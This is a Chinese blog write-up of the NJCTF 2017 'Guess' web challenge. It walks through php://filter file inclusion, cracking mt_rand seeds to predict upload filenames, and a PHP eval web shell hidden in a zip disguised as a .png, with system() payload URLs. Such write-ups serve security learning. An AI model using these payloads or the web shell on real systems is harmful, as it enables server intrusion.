2017 NJCTF Web Guess

最新推荐文章于 2024-11-11 10:37:58 发布
最新推荐文章于 2024-11-11 10:37:58 发布
阅读量1.8k 收藏
点赞数 3
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42348709/article/details/85407171
版权

新博客:https://wywwzjj.top/

粗一看,是文件上传的题目。随便传一个文件试试,测试可知,只是验证后缀,改后缀即可绕过。

问题是文件传到哪里去了,这也是本题的核心考点。

http://111.198.29.45:30117/?page=upload

url 有所变化,可能任意跳转,尝试下伪协议读源码,成功。

http://111.198.29.45:30117/?page=php://filter/read=convert.base64-encode/resource=index

// index.php
<?php
    error_reporting(0);

    session_start();
    if(isset($_GET['page'])){
        $page=$_GET['page'];
    }else{
        $page=null;
    }

    if(preg_match('/\.\./',$page)) {
        echo "<div class=\"msg error\" id=\"message\">
        <i class=\"fa fa-exclamation-triangle\"></i>Attack Detected!</div>";
        die();
    }
?>

<?php
    if($page) {
        if(!(include($page.'.php'))) {
            echo "<div class=\"msg error\" id=\"message\">
        <i class=\"fa fa-exclamation-triangle\"></i>error!</div>";
            exit;
        }
    }
?>

index.php 没太多用处,核心在 upload.php。

http://111.198.29.45:30117/?page=php://filter/read=convert.base64-encode/resource=upload

<?php
	error_reporting(0);
	function show_error_message($message) {
		die("<div class=\"msg error\" id=\"message\">
		<i class=\"fa fa-exclamation-triangle\"></i>$message</div>");
	}

	function show_message($message) {
		echo("<div class=\"msg success\" id=\"message\">
		<i class=\"fa fa-exclamation-triangle\"></i>$message</div>");
	}

	function random_str($length = "32") {
		$set = array("a", "A", "b", "B", "c", "C", "d", "D", "e", "E", "f", "F",
			"g", "G", "h", "H", "i", "I", "j", "J", "k", "K", "l", "L",
			"m", "M", "n", "N", "o", "O", "p", "P", "q", "Q", "r", "R",
			"s", "S", "t", "T", "u", "U", "v", "V", "w", "W", "x", "X",
			"y", "Y", "z", "Z", "1", "2", "3", "4", "5", "6", "7", "8", "9");
		$str = '';

		for ($i = 1; $i <= $length; ++$i) {
			$ch = mt_rand(0, count($set) - 1);
			$str .= $set[$ch];
		}
		return $str;
	}

	session_start();

	$reg='/gif|jpg|jpeg|png/';
	if (isset($_POST['submit'])) {
		$seed = rand(0,999999999);  // 生成随机数做种子
		mt_srand($seed);  			// 用seed给随机数发生器播种
		$ss = mt_rand();  			// 取随机数
		
        $hash = md5(session_id() . $ss);  // session_id() 是可控的,设为 0 或者很短的值
        // 服务端对 session_id() 的态度:你有用你的,你没有我给你设。
		
        setcookie('SESSI0N', $hash, time() + 3600);
		// 此处是设置 SESSION 
        
		if ($_FILES["file"]["error"] > 0) {
			show_error_message("Upload ERROR. Return Code: " . $_FILES["file-upload-field"]["error"]);
		}
		$check2 = ((($_FILES["file-upload-field"]["type"] == "image/gif")
				|| ($_FILES["file-upload-field"]["type"] == "image/jpeg")
				|| ($_FILES["file-upload-field"]["type"] == "image/pjpeg")
				|| ($_FILES["file-upload-field"]["type"] == "image/png"))
			&& ($_FILES["file-upload-field"]["size"] < 204800));
		$check3 = !preg_match($reg,pathinfo($_FILES['file-upload-field']['name'], PATHINFO_EXTENSION));


		if ($check3) show_error_message("Nope!");
		if ($check2) {
			$filename = './uP1O4Ds/' . random_str() . '_' . $_FILES['file-upload-field']['name'];
			if (move_uploaded_file($_FILES['file-upload-field']['tmp_name'], $filename)) {
				show_message("Upload successfully. File type:" . $_FILES["file-upload-field"]["type"]);
			} else show_error_message("Something wrong with the upload...");
		} else {
			show_error_message("only allow gif/jpeg/png files smaller than 200kb!");
		}
	}
?>

$filename = ‘./uP1O4Ds/’ . random_str() . ‘_’ . $_FILES[‘file-upload-field’][‘name’];

由此可知,重点是预测 random_str() 的值。

联想到此前的 2018 SWPUCTF 用优惠码买个X?SWPUCTF wp

因此我们只要得到 mt_srand() 函数的播种种子的值,就可以预测出24位的优惠码。

测试发现无论是rand()函数还是mt_rand()函数,当随机数种子相同的时候,无论运行多少次,产生的随机数序列都是一样的,所以如果我们在代码中自己播种了随机数种子,但是泄露了这个种子,就会导致产生的随机数序列被别人猜到,造成安全问题.

对于这个题也类似,只要得到种子,就能预测。

php的随机数的安全性分析

大牛的爆破种子神器

直接强行爆破太麻烦了,先爆出一个随机数,利用这个随机数去爆破它的种子。

将 test.php 文件打个压缩包 test.zip,然后改后缀名 test.png,利用 zip:// 解压缩读取

http://111.198.29.45:30117/?page=zip://uP1O4Ds/Ah86F1AZxgsLc8UUjkHPZRKMoCM3XUdT_test.png%23test/test&a=phpinfo();

种子确定了,随机值也确定了,直接利用源代码中的方式就能推出路径。

<?php  
	$std = "6f51b1f6ba8ee543732b21dbe0efacb9";  // cookie 中的 SESSION
    for($i=0;$i<=999999999;$i++) {
        $ha = md5("0" . $i);
        if($ha === $std) {
            echo "Success-----------=>" . $i;
            // 爆出随机数为 i
            break;
        }
        if($i % 100000000 == 0) echo $i . "\n";
    }
?>

得出随机数

屏幕捕获_2018_12_30_19_58_38_361.png

然后利用神器,爆出种子

屏幕捕获_2018_12_30_20_10_40_322.png

利用这个脚本

// 爆出来的种子
$arr = array(76047661,1136899518,1497431590,2832522619);  
foreach($arr as $a) {
    mt_srand($a);
    $set = array("a", "A", "b", "B", "c", "C", "d", "D", "e", "E", "f", "F",
                 "g", "G", "h", "H", "i", "I", "j", "J", "k", "K", "l", "L",
                 "m", "M", "n", "N", "o", "O", "p", "P", "q", "Q", "r", "R",
                 "s", "S", "t", "T", "u", "U", "v", "V", "w", "W", "x", "X",
                 "y", "Y", "z", "Z", "1", "2", "3", "4", "5", "6", "7", "8", "9");
    $str = '';
    $ss = mt_rand();  // 这一步必须加上,否则与服务器端的随机值对应不上
    for ($i = 1; $i <= 32; ++$i) {
        $ch = mt_rand(0, count($set) - 1);
        $str .= $set[$ch];
    }

    // echo 'zip://uP1O4Ds/' . $str . '_test.png%23test&a=phpinfo();' . "<br>";
    echo 'http://111.198.29.45:30117/uP1O4Ds/' . $str . '_test.png' . "<br>";
}

先检查地址是否有效,然后利用之前传的后门进行命令执行。

// test.php
<?php
    eval($_GET['a']);
?>

最后的 payload 如下:

http://111.198.29.45:30117/?page=zip://uP1O4Ds/Ah86F1AZxgsLc8UUjkHPZRKMoCM3XUdT_test.png%23test/test&a=system(%27ls%27);

# test.png%23test&a=system(%27ls%27); 这样是不行的,网上都是这个路子==,找时间整理下

CSS flag-Edi98vJF8hnIp.txt index.html index.php js uP1O4Ds upload.php upload.php

然后 cat flag

http://111.198.29.45:30117/?page=zip://uP1O4Ds/Ah86F1AZxgsLc8UUjkHPZRKMoCM3XUdT_test.png%23test/test&a=system(%27cat%20./flag-Edi98vJF8hnIp.txt%27);

xctf{3fbbe15371c9cd42ec1a698d7660849a} xctf{3fbbe15371c9cd42ec1a698d7660849a}
NJCTF 2017 web Writeup
Bendawang's Blog
03-13 9190
NJCTF 2017 web Writeup
攻防世界 web高手进阶区 10分题 Guess
闵行小鱼塘
11-03 1520
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Guess的writeup
2017NJCTF get flag writeup
Aurora的博客
03-12 1205
 题目网址:http://218.2.197.235:23725/         打开题目是一个输入框,是输入文件名来搜索图片的功能。随便输入aaa跳转到了另一个页面,是一张读不出来的图片。查看源代码可看到        查了一下是基于RFC2397的一种URL格式,可以直接嵌入网页显示的一种数据显示方式。base64后面是base64编码的语句,解密一
SafeBox(NJCTF)
qq_41071646的博客
03-26 1917
这个题 其实还是挺简单的 但是吧。。。。。。。。。 比较可惜的一点就是 最近脑子不太对 看 pwn 看的头晕 然后课还是比较多 然后 比较可惜的是 心情也不太好吧 然后在 看雪论坛上 看到了一个病毒样本 准备 有空去 分析一波 好久没有 逆向过什么东西 所以 看了一个安卓的逆向题 看了看 玩了一下 感觉有点意思 就写了下来 这个题 有意思 就有意思在 一开始我并...
NJCTF (easycrack)
weixin_34352449的博客
05-27 651
安装app查看。一个输入框,输入随便输入显示Try again. 放入JEB反编译。 关于输入框监听是第一次见,具体可以看看这个博客https://www.jianshu.com/p/f976c677189a 函数的作用是,如果字符串s变动,将会执行具体的实现。这里是调用了native层的parseText函数。 接下来反编译apk,用IDA打开位于lib文件夹中的so文件,如下图...
bugku-逆向-10、SafeBox(NJCTF)(Android逆向)
Onlyone_1314的博客
09-29 7638
文章目录一、反编译查看源代码二、源代码分析三、方法1:正向暴力破解四、方法二:按照筛选条件,逐步缩小范围 先下载软件,发现是个安卓的apk安装包,安装之后打开: 一、反编译查看源代码 只有一个输入框,其他的点不了。应该是要输入某个字符串然后判断是否正确,之后返回flag。 打开apk反编译: 发现有两个Activity,而且代码高度相似,查看AndroidManifest.xml: 多个Activity可以显示多个不同的界面,setContentView就是设置一个Activity的显示界面,使用s
CTF---Web入门第八题 Guess Next Session
weixin_33890526的博客
11-08 304
Guess Next Session分值:10 来源: iFurySt 难度:易 参与人数:3870人 Get Flag:1672人 答题人数:1690人 解题通过率:99% 写个算法没准就算出来了,23333 hint:你确定你有认真看判断条件? 格式:CTF{} 解题...
逆向攻防世界CTF系列22-Guess-the-Number
最新发布
LH1013886337的博客
11-11 484
【代码】逆向攻防世界CTF系列22-Guess-the-Number。
网鼎杯pwn之GUESS
Peanuts
08-30 2078
做了网鼎杯才发现自己有多菜。。。 拿到题目先ida一波 基本分析 看到了发现了是一个本地加载flag.txt所以有可能可以用stack samsh:详细可以看ctf wiki上的花式栈溢出技巧然后拖入gdb 进行一波checksec             可以发现有了nx栈不可执行这个还好,但是看到了cannary就有点头疼了。。还好有stack smash这个方法可以...
[BUUCTF]wdb2018_guess——Stack smash技巧
zyxx_wjc的博客
07-20 526
stack smash
buuctf GUESS,ZCTF note2学习
weixin_46521144的博客
07-09 326
GUESS 知识点 stack smash\environ泄露栈地址 题解 这道题是一道栈题,好久没见栈题。 可以看到程序会把flag读入内存,之后fork子进程让你猜。这里需要事先了解fork工作方式:把父进程虚拟内存空间完全复制一份(具体来说,私有写时复制)这说明子进程会复制flag,以及栈上所有内容。利用这一点以及题目给我们的三次机会,结合canary smash原理解题。 stack smash之后会输出一串字符串,其地址是environ[0]。基本思路是通过gets()栈溢出,修改environ[
BUUCTF WEB Can You Guess it?
qq_41696858的博客
03-03 446
代码审计,依旧有我们的老朋友preg_match,不会还有一个新朋友basename() 先看源码 <?php include 'config.php'; // FLAG is defined in config.php if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I don't know what you are thinking, but I won't let you read it :)"); }
CTF|栈溢出guess num 练习及知识点总结
skyattractive的博客
05-31 1281
CTF|栈溢出题目guess_num 练习及知识点总结 博客主要记录博主做的一栈溢出题目和所涉及到的知识点的总结 . 题目 将得到的文件拖入64位IDA中F5反编译得到伪代码 观察伪代码 得到如下信息: 定义char型 v9 让你输入内容,用gets()函数获取你输入的值,但是没有做限制 将v6 = v8就success! 实现success!之后可以进入sub-C3E函数,即可得到flag! 其中代码涉及到两个特殊的函数 关于两个函数的知识点如下: rand()函数用来产生随机数,但是,ran.
攻防世界WEB进阶之Triangle
harry_c的博客
08-06 1784
攻防世界WEB进阶之Triangle第一步:分析第二步:实操第三步:答案第四步:参考,本文参考的博客是: 第一步:分析 难度系数:4星 题目来源: Hack.lu-2017 题目描述:暂无 第二步:实操 get_pw() XYzaSAAX_PBssisodjsal_sSUVWZYYYb function getARM1(){ var x = stoh(atob(getBase64Image(“fr...
CTF之隐写术破解总结
热门推荐
小伟锅的博客
08-26 4万+
一、隐写术可以利用图片、音频、视频为载体将数据隐藏在其中,将数据隐写到图像中较为常见。 二、图像隐写术进行数据隐写分为以下几类: 1.在图片右击-属性-详细信息中隐藏数据信息 2.将数据类型进行改写(rar类型数据 将其改写成jpg格式) 3.根据各种类型图像的固定格式,隐藏数据 修改图像开始标志,改变其原有图像格式; 在图像结束标志后加入数据; 在图
xctfwp
zyh18851473527的博客
09-23 1218
首先将其拖进IDA64中查看一下 根据代码可以得知猜对50次的数字后就可以get flag了 但是实际上只给buf分配了0x30的空间 buf 长度最长为 0x50 但是当输入大于 49 的时候不会被截断,所以我们只要覆盖到之前的 seed 就可以为所欲为了。 同时注意到 seed 跟 buf 相差的偏移是 0x40,所以只要 68 个字符就可以溢出覆盖 seed 了。我们写入0x40的数据就可以...
一道简单的python题--Triangle Quest
bianer199的专栏
06-16 1187
一道简单的python题输入 5 输出 1 22 333 4444 普通写法for i in range(1,input()): print str(i)*i 装B写法 lambda函数for i in range(1,input()): print reduce(lambda final, num: final * 10 + num, [i for j in xran
xctf--新手区--guess_num
gclome的博客
04-20 907
writeup 老规矩,先checksec下,查看保护机制 64位程序,保护机制全开啊,不过不慌,先运行一下大致看看 两次输入分别是Your name和 guess number ,其余皆是程序输出,貌似没有得到什么有用的东西。 再次借助强大的IDA查看源码: 分析源码得知,我们要输入十次随机数产生的值,如果一次错,那就GG,十次全部输入正确,就success!,flag应该就藏在succes...
【BugkuCTFWeb--输入密码查看flag
VZZmieshenquan的博客
02-08 2万+
Description: http://123.206.87.240:8002/baopo/ 作者:Se7en Solution: 进入网页 先用Burp Suite抓包选择Sniper,点击Clear清除Burp Suite认为需要猜测的密码,再点击Add添加需要猜测的地方 然后选择Numbers,根据提示是五位数 设置从10000到99999,次数1次,再进行攻击得到密码得到flag ...
提升Web性能:Guess.js与Next.js的预测性预取集成实践
Guess.js与Next.js的集成是一个涉及Web性能优化的先进技术实践,它结合了机器学习和现代Web开发框架的优势,旨在提升用户在网站上的交互体验。本知识点将深入探讨Guess.js与Next.js集成的原理、优势和实现步骤。 1....
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值